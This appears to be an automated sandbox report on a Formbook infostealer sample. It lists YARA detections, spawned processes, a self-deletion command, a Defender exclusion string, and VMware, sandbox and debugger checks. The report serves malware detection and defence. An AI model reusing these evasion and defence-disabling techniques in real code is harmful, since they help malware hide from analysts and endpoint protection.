          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: s6G3ZtvHZg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@16/9
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\s6G3ZtvHZg.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeMutant created: \Sessions\1\BaseNamedObjects\kkigloYTgmEpnQoD
          Source: s6G3ZtvHZg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: s6G3ZtvHZg.exeVirustotal: Detection: 27%
          Source: s6G3ZtvHZg.exeReversingLabs: Detection: 25%
          Source: unknownProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exeJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess created: C:\Users\user\Desktop\s6G3ZtvHZg.exe C:\Users\user\Desktop\s6G3ZtvHZg.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe'Jump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: s6G3ZtvHZg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: s6G3ZtvHZg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 0_2_00C804D0 push C03300AFh; ret 0_2_00C804E2
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004152F5 push esi; retf 3_2_00415301
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041536A push esi; retf 3_2_00415301
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3F2 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3FB push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B3A5 push eax; ret 3_2_0041B3F8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0041B45C push eax; ret 3_2_0041B462
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0178D0D1 push ecx; ret 3_2_0178D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_02E1D0D1 push ecx; ret 14_2_02E1D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A52F5 push esi; retf 14_2_003A5301
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003A536A push esi; retf 14_2_003A5301
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3A5 push eax; ret 14_2_003AB3F8
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3FB push eax; ret 14_2_003AB462
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB3F2 push eax; ret 14_2_003AB3F8
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003AB45C push eax; ret 14_2_003AB462
          Source: C:\Windows\SysWOW64\help.exeCode function: 14_2_003ABDAE push esp; iretd 14_2_003ABDB1
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94799509268
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: s6G3ZtvHZg.exe PID: 6076, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000003985E4 second address: 00000000003985EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 000000000039896E second address: 0000000000398974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6092Thread sleep time: -104796s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe TID: 6152Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2148Thread sleep time: -55000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 1528Thread sleep time: -48000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 104796Jump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.276519676.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000002.522445259.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.276742603.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000004.00000000.276627060.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.272267558.00000000069D9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252870507.0000000002920000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000004.00000000.271443622.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_004088A0 rdtsc 3_2_004088A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_00409B10 LdrLoadDll,3_2_00409B10
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B171 mov eax, dword ptr fs:[00000030h]3_2_0173B171
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B171 mov eax, dword ptr fs:[00000030h]3_2_0173B171
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173C962 mov eax, dword ptr fs:[00000030h]3_2_0173C962
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175B944 mov eax, dword ptr fs:[00000030h]3_2_0175B944
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175B944 mov eax, dword ptr fs:[00000030h]3_2_0175B944
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176513A mov eax, dword ptr fs:[00000030h]3_2_0176513A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176513A mov eax, dword ptr fs:[00000030h]3_2_0176513A
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov eax, dword ptr fs:[00000030h]3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01754120 mov ecx, dword ptr fs:[00000030h]3_2_01754120
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]3_2_01739100
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]3_2_01739100
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01739100 mov eax, dword ptr fs:[00000030h]3_2_01739100
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]3_2_0173B1E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]3_2_0173B1E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0173B1E1 mov eax, dword ptr fs:[00000030h]3_2_0173B1E1
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017C41E8 mov eax, dword ptr fs:[00000030h]3_2_017C41E8
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]3_2_017B51BE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]3_2_017B51BE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]3_2_017B51BE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B51BE mov eax, dword ptr fs:[00000030h]3_2_017B51BE
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017661A0 mov eax, dword ptr fs:[00000030h]3_2_017661A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017661A0 mov eax, dword ptr fs:[00000030h]3_2_017661A0
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]3_2_017F49A4
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]3_2_017F49A4
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]3_2_017F49A4
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F49A4 mov eax, dword ptr fs:[00000030h]3_2_017F49A4
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017B69A6 mov eax, dword ptr fs:[00000030h]3_2_017B69A6
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01762990 mov eax, dword ptr fs:[00000030h]3_2_01762990
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176A185 mov eax, dword ptr fs:[00000030h]3_2_0176A185
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0175C182 mov eax, dword ptr fs:[00000030h]3_2_0175C182
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_017F2073 mov eax, dword ptr fs:[00000030h]3_2_017F2073
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01750050 mov eax, dword ptr fs:[00000030h]3_2_01750050
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_01750050 mov eax, dword ptr fs:[00000030h]3_2_01750050
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]3_2_0176002D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]3_2_0176002D
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeCode function: 3_2_0176002D mov eax, dword ptr fs:[00000030h]3_2_0176002D
